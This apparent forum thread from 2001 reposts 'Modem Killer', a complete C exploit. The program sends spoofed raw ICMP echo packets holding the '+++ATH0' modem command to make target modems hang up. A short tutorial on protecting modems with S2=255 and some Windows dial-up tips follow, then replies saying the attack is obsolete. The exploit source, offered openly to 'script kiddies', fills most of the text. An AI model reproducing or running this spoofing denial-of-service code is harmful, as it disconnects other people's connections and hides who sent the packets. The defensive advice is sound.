/* Hi, this is basically a small C program to quickly use the +++AZH0 modem bug on a given target. This thing is handy because you do not have to go through the trouble of typing the ping string, and it spoofs, which is also quite handy
Anyway, use this to disconnect most modems on ANY OS on the internet by sending an ICMP_ECHO_REQUEST with the contents of +++AZH0. The modem gets it and (since it's an ICMP ECHO) sends the same packet back and resets. It can be patched by setting the modem register S2 to such a value that turns the command mode of the modem off (255 will do). The modem will NOT execute the commands in the packets anymore and function stable.
NOTE: Before you actually USE this program, turn your OWN command mode or else, your modem will RESET upon trying to send the packets away. Put the statement S2=255 somewhere in your modem CALL STRING. It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
At least, it does so on my modem. Note that some modems will get into trouble with the command mode turned off. If this is the case, tough, you CANNOT use this program AND you ARE VULNERABLE to this attack.
This should be it, all you script kiddies, have fun. Do with this code wathever you want, it's way too simple and lame.
Have fun,
Scrippie
If you think this program is truly cool (which is not true) mail me at:
ronald.huizer@wxs.nl
The way to patch a modem has been added thanks to Ardrian Gonzales...
Some modems may disconnect when trying to use the patch.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define BUFFER 80
#define RESET "+++ATH0\x0d"
#define PATCH "+++ATH0H1TD112\x0d"
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
unsigned short in_cksum(u_short *addr, int len);
int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
{
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
char *blah;
int rc;
int c;
int b=0;
switch(type)
{ case (0): { blah = RESET; break; }
case (1): { blah = PATCH; break; }
default: blah = RESET;
}
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
{
if(b==strlen(blah)) b=0;
packet[c]=blah[b];
b++;
}
/* This is the IP header of our packet. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->id = htons(43210);
ip->frag_off = htons(0);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
ip->ttl = 25;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = 0;
icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv)
{
struct sockaddr_in dest_addr;
unsigned int i,sock,type;
unsigned long src_addr;
if(geteuid()!=0)
{
fprintf(stderr, "You must be ROOT in order to run this!\n");
return(-1);
}
printf("Modem Killer - Version 1.0b - Spoofable\n");
printf("By Scrippie\n");
if ((argc != 5)) {
printf("Use the following format:\n");
printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
printf("Where type means the type of the modem crash.\n");
printf("---------------------------------------------\n");
printf("Type 0: Makes the modem hangup\n");
printf("Type 1: Patches a modem against attacks\n");
printf("---------------------------------------------\n");
printf("Greetz, Scrippie\n");
return(-1);
}
switch(atoi(argv[4]))
{
case (0): { type = 0; break; }
case (1): { type = 1; break; }
default:{ printf("WRONG type you idiot!\n"); return(-1); }
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr,"No RAW sockets available...\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Now sending the modem kill...\n");
for (i = 0;i < atoi(argv[3]);i++)
{
if (killmodem(sock, src_addr, &dest_addr, type) == -1)
{
fprintf(stderr,"Cannot send packet...\n");
return(-1);
}
usleep(10000);
}
}
/********************************************\
*** Of course, no one has EVER seen this piece of networking code before... ***
\********************************************/
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
More --->>
--------------------------------------------------------------------------------
More on modems...
Protection
Well, protection from these attacks is quite simple. But, I do suggest that before you read this section, you should try the above attacks on yourself, and see whether you are vulnerable or not. Anyway, to protect your modem from ATH0 attacks, or in other words to prevent it from switching from online mode to command line mode, all you have to do is: Set your init string to: S2=255.
*******************
HACKING TRUTH: You can change the initialization settings of your modem, in two different ways-:
1.Through the Windows Registry (The Kewl, but long Way)
Go to, the following registry key and change the Settings to the Value you want it to be.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Modem\0000\Init
2.Through the Modems option in the Control Panel. (The shorter, but not so kewl method.)
Simply Click on: Start > Settings > Control Panel. Then right click on Modems Choose Properties > Configure > Connection > Advanced.
Then enter the string in the specified area.
*******************
This will make your modem safe from this kind of attack, as it will treat AT commands as data, due to the fact that it will remain in online mode and not switch to command mode. However, some very obsolete modems tend to remain unaffected from the above protection method and thus remain vulnerable. Also, I have heard that there are some Anti-Nuke protection software, which provide your system protection from ATH0 attacks. Try: www.anticode.com
And for complete information and documentation on Hayes Compatible AT commands, visit the following sites: www.modem.com and
www.modemhelp.com
More --->>
More on modems...
Modem Tips and Tricks
Remember the batch file Virus, that I showed how to code in one of my previous tutorials? Well, keeping in mind, the power of DOS exhibited in that manual, here is yet another trick which shows you how to dial a connection or connect to the Internet by a simple single line DOS command. The syntax of the command is: (Case Sensitive)
rundll rnaui.dll,RnaDial ConnectionName
For Example,
If the connection name, which I want to dial is: MTNL, then the command which will pop up the Connection Dial Box would be:
C:\windows> rundll rnaui.dll,RnaDial MTNL
If you want the ‘Make New Connection’ Dialog box to pop up, then use the following command:
C:\windows>rundll rnaui.dll,RnaWizard /1
Source code included( and worked a while back) I hope it is of some help
-
December 13th, 2001, 05:24 AM
#7
Member
1. yes, modem jammers are A. obselete B. only in movies
2. i just go to thinking, and wouldn't it be nice, instead of pasting an entire tutorial (twice), how about only once?
-
December 13th, 2001, 05:36 PM
#8
Originally posted by dfgt5
1. yes, modem jammers are A. obselete B. only in movies
2. i just go to thinking, and wouldn't it be nice, instead of pasting an entire tutorial (twice), how about only once?
Right...sorry I don't know how it got posted twice hmmmmmm
anyway it was the wrong post for it to happen on
-
December 15th, 2001, 09:41 PM
#9
Junior Member
Yeah, Thank u , that was helpfull.
-
December 15th, 2001, 09:51 PM
#10
Junior Member
[QUOTE]Originally posted by oddvector
I'm not sure what you mean my modem jammer.
There is no way to stop a phone trace from a modem.
There are some programs out there that can make older unprotected modems hang up. They do this by sending the hang up at command in a ping. Fortunately that sort of tech is obsolete now, most new modems won't accept at commands over tcp/ip anymore.
__________________________________________________
I'm agree with u that there is no way to stop tracing a call , but since I am not interested much in phreahacking , I just want to sure about it, because I have downloaded a program that call itself a modem jammer but I couldn't figur out what it does!
Any way I will post my zip file, test it
Any way thank u
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|